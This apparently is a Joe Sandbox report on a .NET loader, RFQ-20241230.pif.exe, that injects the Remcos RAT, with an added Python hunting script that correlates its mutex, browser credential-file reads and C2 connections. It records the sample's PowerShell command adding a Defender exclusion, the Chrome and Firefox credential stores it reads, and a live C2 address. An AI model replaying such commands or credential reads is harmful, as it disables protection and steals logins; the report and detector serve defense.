                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0040B335 \AppData\Roaming\Mozilla\Firefox\Profiles\
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_0040B335 \key3.db

                Remote Access Functionality

                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-4WOIVV
                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe | Code function: 5_2_00405042 cmd.exe
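The Stealing of Sensitive Information and Remote Access Functionality sections above give three host-side artefacts worth hunting together: the Rmc-4WOIVV mutex, reads of Chrome's Login Data and Firefox's key3.db by something other than a browser, and the geoplugin.net request alongside the C2 address 173.211.106.233 from the network table further down. The following is an added example, not the sandbox's own code, that correlates constructed telemetry of those three kinds. Assumptions of this example: the mutex pattern "Rmc-" plus six upper-case alphanumerics, the key4.db and logins.json names added for current Firefox profiles, the PID values, and the scoring rule that a geoplugin.net lookup corroborates a finding but never carries one on its own (the report's URL table lists it as non-malicious, and it is an ordinary public service).

```python
import re
from collections import defaultdict

# Remcos default mutex shape seen in the report (Rmc-4WOIVV).
# Assumption: 'Rmc-' followed by six upper-case alphanumerics.
MUTEX_RE = re.compile(r"^Rmc-[A-Z0-9]{6}$")
# Browser credential stores named in the code-function rows above, plus
# Firefox's newer key4.db / logins.json pair (not on the page; added here).
CRED_STORES = re.compile(
    r"\\(?:Google\\Chrome\\User Data\\[^\\]+\\Login Data"
    r"|Mozilla\\Firefox\\Profiles\\[^\\]+\\(?:key3\.db|key4\.db|logins\.json))$",
    re.IGNORECASE,
)
BROWSERS = {"chrome.exe", "firefox.exe"}   # processes allowed to touch those files
GEO_CHECK_HOSTS = {"geoplugin.net"}        # benign lookup the sample performs; corroborating only
C2_IPS = {"173.211.106.233"}               # the report's IP table entry flagged malicious


def hunt(mutexes, file_events, connections):
    """Correlate three telemetry streams into a dict of PID -> list of reasons."""
    findings = defaultdict(list)
    for pid, name in mutexes:
        if MUTEX_RE.match(name):
            findings[pid].append(f"Remcos-style mutex {name}")
    for pid, image, path in file_events:
        if CRED_STORES.search(path) and image.lower() not in BROWSERS:
            findings[pid].append(f"{image} read browser credential store {path}")
    for pid, host, ip in connections:
        if ip in C2_IPS:
            findings[pid].append(f"connection to known C2 {ip}")
        elif host in GEO_CHECK_HOSTS:
            findings[pid].append(f"geolocation lookup to {host} (corroborating only)")
    return dict(findings)


def score(reasons):
    """High only if at least one reason stands on its own."""
    return "high" if any("corroborating" not in r for r in reasons) else "low"


# Constructed telemetry; PID 7924 is the second RFQ-20241230.pif.exe instance
# named in the Yara rows, PID 1204 and 3310 are benign controls, 5120 is a
# process that only performed the geolocation lookup.
SAMPLE_MUTEXES = [(7924, "Rmc-4WOIVV"), (1204, "Local\\MSCTF.Asm.MutexDefault1")]
SAMPLE_FILE_EVENTS = [
    (7924, "RFQ-20241230.pif.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (7924, "RFQ-20241230.pif.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\abcd.default\key3.db"),
    (3310, "chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]
SAMPLE_CONNECTIONS = [
    (7924, "geoplugin.net", None),
    (7924, None, "173.211.106.233"),
    (5120, "geoplugin.net", None),
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_MUTEXES, SAMPLE_FILE_EVENTS, SAMPLE_CONNECTIONS).items():
        print(pid, score(reasons), reasons)
```

Mutex names come from a handle enumeration or a memory image, the file-access records from an EDR file-read stream (Sysmon on its own does not log reads), and the connections from proxy or flow logs. Blocking 173.211.106.233 is the immediate action; treat a geoplugin.net hit as a lead for finding further infected hosts, not as something to block.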
                MITRE ATT&CK matrix: techniques with at least one signature hit, grouped by tactic. The badge value is given in brackets exactly as extracted; a value such as 121 or 111 may be several adjacent badges run together rather than a single count. The remaining cells of the matrix are the empty template, and no technique was hit under Reconnaissance, Resource Development, Initial Access, Lateral Movement or Exfiltration.

                Execution: Native API [1], Command and Scripting Interpreter [1], Service Execution [2]
                Persistence: DLL Side-Loading [1], Windows Service [1]
                Privilege Escalation: DLL Side-Loading [1], Bypass User Account Control [1], Access Token Manipulation [1], Windows Service [1], Process Injection [121]
                Defense Evasion: Disable or Modify Tools [11], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [3], Software Packing [2], DLL Side-Loading [1], Bypass User Account Control [1], Masquerading [1], Virtualization/Sandbox Evasion [31], Access Token Manipulation [1], Process Injection [121]
                Credential Access: OS Credential Dumping [1], Input Capture [111], Credentials In Files [2]
                Discovery: System Time Discovery [2], Account Discovery [1], System Service Discovery [1], File and Directory Discovery [3], System Information Discovery [33], Security Software Discovery [21], Virtualization/Sandbox Evasion [31], Process Discovery [2], Application Window Discovery [1], System Owner/User Discovery [1]
                Collection: Archive Collected Data [11], Input Capture [111], Clipboard Data [3]
                Command and Control: Ingress Tool Transfer [11], Encrypted Channel [2], Non-Standard Port [1], Remote Access Software [1], Application Layer Protocol [1]
                Impact: System Shutdown/Reboot [1], Defacement [1]
                Source | Detection | Scanner | Label
                RFQ-20241230.pif.exe | 74% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
                RFQ-20241230.pif.exe | 100% | Avira | HEUR/AGEN.1309540
                RFQ-20241230.pif.exe | 100% | Joe Sandbox ML
                No Antivirus matches

                Note on the labels: the ReversingLabs name points at FormBook and its ByteCode-MSIL prefix at a .NET file, which fits the .NET assemblies the first instance loads (System.Windows.Forms, Microsoft.VisualBasic in the volume-information rows above). The image written into the second instance at base 400000 (see Memory written above) is what the Yara matches and the Rmc- mutex under Remote Access Functionality identify as Remcos. Read the vendor family label as describing the loader, not the payload.
                Name | IP | Active | Malicious | Reputation
                s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | high

                Name | Source | Malicious | Reputation
                http://geoplugin.net/json.gp | RFQ-20241230.pif.exe | false | high
                http://geoplugin.net/json.gp/C | RFQ-20241230.pif.exe, 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, RFQ-20241230.pif.exe, 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, RFQ-20241230.pif.exe, 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RFQ-20241230.pif.exe, 00000000.00000002.1360288843.0000000003061000.00000004.00000800.00020000.00000000.sdmp | false | high

                IP | Domain | Country | ASN | ASN Name | Malicious
                173.211.106.233 | unknown | United States | 46261 | QUICKPACKETUS | true
                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1586923
                        Start date and time:2025-01-09 19:02:12 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 40s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed:11
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:RFQ-20241230.pif.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.expl.evad.winEXE@7/6@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 93%
                        • Number of executed functions: 94
                        • Number of non-executed functions: 194
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 23.56.254.164, 20.12.23.50
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: RFQ-20241230.pif.exe
Time | Type | Description
13:03:05 | API Interceptor | 4918715x Sleep call for process: RFQ-20241230.pif.exe modified
13:03:07 | API Interceptor | 13x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
173.211.106.233 | Suppliers_Data.pif.exe | malicious | Remcos |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | 24 UA10005 TCS-condaco-Lease_7_oct.xlam.xlsx | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Nuevo-orden.xla.xlsx | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Nuevo-orden.xla.xlsx | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | ReIayMSG__polarisrx.com_#7107380109.htm | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | ReIayMSG__polarisrx.com_#6577807268.htm | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Appraisal-nation-Review_and_Signature_Request46074.pdf | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | PO_62401394_MITech_20250701.exe | malicious | FormBook | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Fqtwswg.exe | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | BPD-003777.exe | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | new.bat | malicious | Unknown | 13.107.246.45
Match | Associated Sample Name / URL | Detection | Threat Name | Context
QUICKPACKETUS | Suppliers_Data.pif.exe | malicious | Remcos | 173.211.106.233
QUICKPACKETUS | c2.hta | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | c2.hta | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | RailProvides_nopump.exe | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | c2.hta | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | https://z97f4f2525fyg27.webflow.io/ | malicious | HTMLPhisher | 172.82.129.154
QUICKPACKETUS | 9W9jJCj9EV.bat | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | c2.hta | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | c2.hta | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | Dd5DwDCHJD.exe | malicious | Quasar | 193.31.28.181
                          Process:C:\Users\user\Desktop\RFQ-20241230.pif.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2232
                          Entropy (8bit):5.380805901110357
                          Encrypted:false
                          SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:lGLHyIFKL3IZ2KRH9Oug8s
                          MD5:F9B7CF60C22DBE6B73266580FFD54629
                          SHA1:05ED734C0A5EF2ECD025D4E39321ECDC96612623
                          SHA-256:880A3240A482AB826198F84F548F4CB5B906E4A2D7399D19E3EF60916B8D2D89
                          SHA-512:F55EFB17C1A45D594D165B9DC4FA2D1364B38AA2B0D1B3BAAE6E1E14B8F3BD77E3A28B7D89FA7F6BF3EEF3652434228B1A42BF9851F2CFBB6A7DCC0254AAAE38
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.852752390307954
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          • Win32 Executable (generic) a (10002005/4) 49.75%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:RFQ-20241230.pif.exe
                          File size:987'699 bytes
                          MD5:a2800b58845d5f108333e9f7f9c388dd
                          SHA1:1a1ce9b83de9d2e967a539aabeafdab36dbb626a
                          SHA256:b43ca133d57448c7afb42bffcb1ce756cdad70308d3f49c9c981fac24c55e76f
                          SHA512:150a651055ac9c697a2132eda8a24f8f1af58d37d8a140356afd24bff629307404691213d04db92ed5948f9f47d9ac0e3e7cea72903984d1ca4b336ccbf2c23f
                          SSDEEP:24576:FzrqD+VnGOgUL+oMIk2W/PpOlL46TFJtV:BqyVnCUaLnZONbTFJX
                          TLSH:592512582B4EE413C56557B51A70F5F41B6D6EDEA801D313AFE86EFBB962E102C08383
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....qg..............0......4......f.... ........@.. .......................`............`................................
                          Icon Hash:16bb2d4d6ccc6593
                          Entrypoint:0x4efb66
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6771FAF8 [Mon Dec 30 01:44:24 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xefb14 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf0000 | 0x3190 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xedbac | 0xedc00 | b9958b4b84778810b74a71efb8fd4f67 | False | 0.9464030461356467 | data | 7.855220500565996 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xf0000 | 0x3190 | 0x3200 | 6994df73fe190be41d32c86321fdf776 | False | 0.941953125 | data | 7.778297678837111 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf4000 | 0xc | 0x200 | 8ceca42ace011e0ef1e8e1997344e4cd | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf00c8 | 0x2d81 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9937333676710447
RT_GROUP_ICON | 0xf2e5c | 0x14 | data | | | 1.05
RT_VERSION | 0xf2e80 | 0x30c | data | | | 0.4307692307692308
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-09T19:03:28.977389+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49734 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:03:51.431052+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49865 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:04:13.902031+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49978 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:04:36.295670+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49981 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:04:58.703809+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49982 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:05:21.120704+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49983 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:05:43.528036+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49984 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:06:05.950386+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49985 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:06:28.391569+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49986 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:06:50.872655+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49987 | 173.211.106.233 | 2404 | TCP
2025-01-09T19:07:13.376765+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.9 | 49988 | 173.211.106.233 | 2404 | TCP
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Jan 9, 2025 19:03:02.320122004 CET | 1.1.1.1 | 192.168.2.9 | 0x55bb | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | (none) | CNAME (Canonical name) | IN (0x0001) | false
                          Jan 9, 2025 19:03:02.320122004 CET | 1.1.1.1 | 192.168.2.9 | 0x55bb | No error (0) | s-part-0017.t-0009.t-msedge.net | (none) | 13.107.246.45 | A (IP address) | IN (0x0001) | false

                          Target ID: 0
                          Start time: 13:03:04
                          Start date: 09/01/2025
                          Path: C:\Users\user\Desktop\RFQ-20241230.pif.exe
                          Wow64 process (32bit): true
                          Commandline: "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                          Imagebase: 0xc30000
                          File size: 987'699 bytes
                          MD5 hash: A2800B58845D5F108333E9F7F9C388DD
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation: low
                          Has exited: true

                          Target ID: 3
                          Start time: 13:03:07
                          Start date: 09/01/2025
                          Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit): true
                          Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                          Imagebase: 0x1f0000
                          File size: 433'152 bytes
                          MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true

                          Target ID: 4
                          Start time: 13:03:07
                          Start date: 09/01/2025
                          Path: C:\Windows\System32\conhost.exe
                          Wow64 process (32bit): false
                          Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase: 0x7ff70f010000
                          File size: 862'208 bytes
                          MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true

                          Target ID: 5
                          Start time: 13:03:07
                          Start date: 09/01/2025
                          Path: C:\Users\user\Desktop\RFQ-20241230.pif.exe
                          Wow64 process (32bit): true
                          Commandline: "C:\Users\user\Desktop\RFQ-20241230.pif.exe"
                          Imagebase: 0xf20000
                          File size: 987'699 bytes
                          MD5 hash: A2800B58845D5F108333E9F7F9C388DD
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation: low
                          Has exited: false

                          Target ID: 6
                          Start time: 13:03:08
                          Start date: 09/01/2025
                          Path: C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit): false
                          Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase: 0x7ff72d8c0000
                          File size: 496'640 bytes
                          MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges: true
                          Has administrator privileges: false
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true


                            Execution Graph

                            Execution Coverage: 7.2%
                            Dynamic/Decrypted Code Coverage: 100%
                            Signature Coverage: 5.5%
                            Total number of Nodes: 55
                            Total number of Limit Nodes: 7
                            Execution graph nodes cover calls to PostMessageW, GetModuleHandleW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateIconFromResourceEx, CreateActCtxA and DuplicateHandle (graph node and edge data omitted).

                            Control-flow Graph

                            Function at 5bd62f8 in the memory dump at 05BD0000 (graph node and edge data omitted).
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
